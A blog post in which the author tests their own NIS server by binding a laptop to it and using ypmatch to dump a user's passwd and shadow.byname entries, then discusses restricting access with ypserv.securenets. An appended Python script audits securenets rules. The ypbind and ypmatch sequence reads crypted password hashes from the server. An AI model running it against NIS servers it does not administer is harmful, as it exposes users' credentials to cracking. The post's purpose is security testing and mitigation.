Diane Trout (alienghic) wrote,

NIS insecurity

I'd heard that NIS was insecure, so I decided to see what I could do. (For those who don't know, NIS is a common method of distributing login information to Unix clusters.) After this experiment, I'm trying to figure out how to use LDAP protected by TLS for my servers.



I tested hacking NIS from my laptop
$ sudo apt-get install nis
$ sudo vi yp.conf
add "ypserver 192.168.20.1" (AKA the NIS server's IP address)
$ sudo vi defaultdomain
add "nisdomain"
(I knew I had limited access to the NIS server to just the subnet, so I made sure to be on the same network)
$ sudo ypbind -d
parsing config file
Trying entry: ypserver 192.168.20.1
parsed ypserver 192.168.20.1
add_server() domain: nisdomain, host: 192.168.20.1, nobroadcast, slot: 0
[Welcome to ypbind-mt, version 1.8]

ping host '192.168.20.1', domain 'nisdomain'
Answer for domain 'nisdomain' from server '192.168.20.1'
Pinging all active server.
$ ypmatch diane shadow
Can't match key diane in map shadow. Reason: No such map in server's domain
$ ypmatch diane passwd.byname
diane:x:1000:1000:Diane Trout:/home/diane:/bin/bash
$ sudo ypmatch diane shadow.byname
diane:uxKjlaDjal:12099:0:99999:7:::134540308

Needless to say, the crypted password is a bogus string and the domain name and IP addresses have been changed to protect the innocent.

One coworker did suggest a solution: explicitly list the IP addresses of all the machines that should have access in the ypserv.securenets file.

That did work, though if an "evildoer" can steal one of my IP addresses, they can still get the crypted passwords.
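As an added illustration (not from the original post), here is a small Python audit of a ypserv.securenets file in the format ypserv reads ("<netmask> <network>" per line, or "host <address>" for a single machine): it answers whether a given client address is allowed at all and flags rules that admit more than one host, since every address a rule covers can pull the maps. The sample file contents are constructed.

```python
"""Audit a ypserv.securenets file: who may query ypserv, and how broad is each rule?"""
import ipaddress

# Constructed sample: the per-host fix from the post, plus one subnet-wide rule for contrast.
SAMPLE_SECURENETS = """\
# ypserv.securenets: "<netmask> <network>" per line; "host" means a single address
host 127.0.0.1
255.255.255.255 192.168.20.10
255.255.255.255 192.168.20.11
255.255.255.0   10.0.5.0
"""


def parse_securenets(text):
    """Return one ipaddress network per non-comment, non-blank line."""
    nets = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) != 2:
            raise ValueError(f"line {lineno}: expected '<netmask> <network>', got {raw!r}")
        mask, network = fields
        if mask == "host":            # ypserv shorthand for a single-host mask
            mask = "255.255.255.255"
        nets.append(ipaddress.ip_network(f"{network}/{mask}", strict=False))
    return nets


def allowed(nets, client_ip):
    """True if ypserv would answer this client; with no rules at all, ypserv answers everyone."""
    if not nets:
        return True
    ip = ipaddress.ip_address(client_ip)
    return any(ip in net for net in nets)


def broad_rules(nets, max_hosts=1):
    """Rules admitting more than max_hosts addresses: each covered address can dump the maps."""
    return [str(net) for net in nets if net.num_addresses > max_hosts]


if __name__ == "__main__":
    rules = parse_securenets(SAMPLE_SECURENETS)
    for ip in ("192.168.20.10", "192.168.20.12", "10.0.5.77"):
        print(ip, "allowed" if allowed(rules, ip) else "denied")
    print("subnet-wide rules:", broad_rules(rules))
```

The audit is IP-based like ypserv itself, so it tells you who is listed, not whether an address on the list has been spoofed.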